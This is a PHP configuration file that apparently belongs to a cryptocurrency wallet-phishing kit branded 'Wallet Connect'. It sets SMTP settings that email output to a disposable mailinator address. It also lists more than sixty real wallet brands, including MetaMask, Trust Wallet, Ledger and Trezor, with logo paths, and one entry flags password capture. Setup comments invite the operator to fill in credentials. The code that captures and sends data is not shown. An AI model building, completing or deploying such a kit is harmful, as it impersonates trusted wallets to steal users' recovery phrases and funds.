<?php
define("EMAIL_HOST", "smtp.hostinger.in"); // Enter your host here
define("EMAIL_FROM_NAME", "Wallet Connect");
define("EMAIL_PORT", 587);
define("EMAIL_TO", "jabu@mailinator.com");
define("EMAIL_SENDER", "myemail@gmail.com");
define("EMAIL_USERNAME", "myemail@gmail.com"); // Enter your email here
define("EMAIL_PWD", "password-here"); //Enter your password here
define("EMAIL_FROM", "myemail@gmail.com");

$wallets = array(
    ["image" => "images/exchange-wallet.png", "name" => "Exchange Connect", "emailPwd" => true],
    ["image" => "images/metamask.png", "name" => "MetaMask"],
    ["image" => "images/MEW.png", "name" => "MEW Wallet"],
    ["image" => "images/trustwallet.png", "name" => "Trust Wallet"],
    ["image" => "images/logo.svg", "name" => "Wallect Connect"],
    ["image" => "images/coinbase.jpg", "name" => "Coinbase Wallet"],
    ["image" => "images/atomic.png", "name" => "Atomic Wallet"],
    ["image" => "images/binance.png", "name" => "Binance Smart Chain"],
    ["image" => "images/bnb.png", "name" => "BNB"],
    ["image" => "images/polkadot.png", "name" => "Polkadot"],
    ["image" => "images/xrp.png", "name" => "XRP"],
    ["image" => "images/stellar.png", "name" => "Stellar"],
    ["image" => "images/tezos.png", "name" => "Tezos"],
    ["image" => "images/theta.png", "name" => "Theta"],
    ["image" => "images/tron.png", "name" => "Tron"],
    ["image" => "images/cosmos.png", "name" => "Cosmos"],
    ["image" => "images/kava.png", "name" => "Kava"],
    ["image" => "images/filecoin.png", "name" => "Filecoin"],
    ["image" => "images/solana.png", "name" => "Solana"],
    ["image" => "images/ethereum-classic.png", "name" => "Ethereum Classic"],
    ["image" => "images/zilliqa.png", "name" => "Zilliqa"],
    ["image" => "images/elrond.jpg", "name" => "Elrond"],
    ["image" => "images/waves.png", "name" => "Waves"],
    ["image" => "images/icon.png", "name" => "ICON"],
    ["image" => "images/ontology.png", "name" => "Ontology"],

    ["image" => "images/oxen.png", "name" => "Oxen Wallet"],
    ["image" => "images/nano.png", "name" => "Nano"],
    ["image" => "images/tomo.png", "name" => "Tomo Chain"],
    ["image" => "images/vechain.jpg", "name" => "VeChain"],
    ["image" => "images/iotex.png", "name" => "IoTex"],
    ["image" => "images/wanchain.png", "name" => "Wanchain"],
    ["image" => "images/harmony.png", "name" => "Harmony"],
    ["image" => "images/kin.png", "name" => "Kin"],
    ["image" => "images/nimiq.png", "name" => "Nimiq"],
    ["image" => "images/aion.png", "name" => "Aion"],
    ["image" => "images/thundertoken.png", "name" => "Thunder Token"],
    ["image" => "images/aeternity.png", "name" => "Aeternity"],
    ["image" => "images/nebulas.png", "name" => "Nebulas"],
    ["image" => "images/fio.png", "name" => "FIO"],
    ["image" => "images/gochain.png", "name" => "GoChain"],
    ["image" => "images/poa.png", "name" => "POA Network"],
    ["image" => "images/callisto.png", "name" => "Callisto"],
    ["image" => "images/bitpay.jpg", "name" => "BitPay"],
    ["image" => "images/aktionariat.png", "name" => "Aktionariat"],
    ["image" => "images/atwallet.png", "name" => "AtWallet"],
    ["image" => "images/guard.png", "name" => "Guard Wallet"],
    ["image" => "images/aave.jpg", "name" => "AAVE"],
    ["image" => "images/exodus.jpg", "name" => "Exodus"],
    ["image" => "images/enjin.jpg", "name" => "Enjin"],
    ["image" => "images/skale.png", "name" => "Skale"],
    ["image" => "images/portis.png", "name" => "Portis"],
    ["image" => "images/trezor.png", "name" => "Trezor"],
    ["image" => "images/squarelink.png", "name" => "Squarelink"],
    ["image" => "images/torus.jpg", "name" => "Torus"],
    ["image" => "images/scatter.jpg", "name" => "Scatter Wallet"],
    ["image" => "images/sumcoin.png", "name" => "Sumcoin"],
    ["image" => "images/math-wallet.png", "name" => "Math Wallet"],
    ["image" => "images/fortmatic.png", "name" => "FortMatic"],
    ["image" => "images/digitex.png", "name" => "Digitex"],
    ["image" => "images/ledger.png", "name" => "Ledger"],
    ["image" => "images/defiat.jpg", "name" => "Defiat"],
    ["image" => "images/authereum.png", "name" => "Authereum"],
    ["image" => "images/flare.jpg", "name" => "Flare Wallet"],
    ["image" => "images/zelcore.png", "name" => "Zelcore"],
    ["image" => "images/bitkeep.png", "name" => "BitKeep"],
    ["image" => "images/coin98.png", "name" => "Coin98"],
    ["image" => "images/trustvault.png", "name" => "Trust Vault"],
);
